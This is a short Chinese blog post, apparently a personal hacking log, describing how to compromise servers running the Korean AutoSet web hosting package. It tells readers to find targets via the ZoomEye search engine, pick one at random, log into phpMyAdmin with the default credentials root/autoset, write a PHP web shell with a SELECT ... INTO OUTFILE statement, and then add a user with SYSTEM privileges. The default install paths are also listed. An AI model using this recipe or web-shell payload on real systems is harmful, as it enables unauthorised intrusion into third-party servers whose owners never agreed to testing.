韩国AutoSet建站程序漏洞实战

  • A+
所属分类:颓废's Blog
摘要

在zoomeye搜索autoset 随便选择目标 左侧栏默认口令:root/autoset 登录phpmyadmin拿shell

实战

在zoomeye搜索autoset

韩国AutoSet建站程序漏洞实战

随便选择目标

韩国AutoSet建站程序漏洞实战

左侧栏默认口令:root/autoset 登录phpmyadmin拿shell 

C:/AutoSet9/public_html                             //网站默认路径 C:/autoset/server/mysql5/data                      //数据库默认路径 C:/Program Files/AutoSet8/public_html             //写shell过程中发现版本不同路径不一样(phpinfo获取)

写shell成功 

select '<?php system($_GET[chill]); ?>' INTO OUTFILE 'C://Program Files//AutoSet8//public_html//Chill.php'

韩国AutoSet建站程序漏洞实战

system权限,直接添加用户

韩国AutoSet建站程序漏洞实战

韩国AutoSet建站程序漏洞实战

作者:边缘人

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: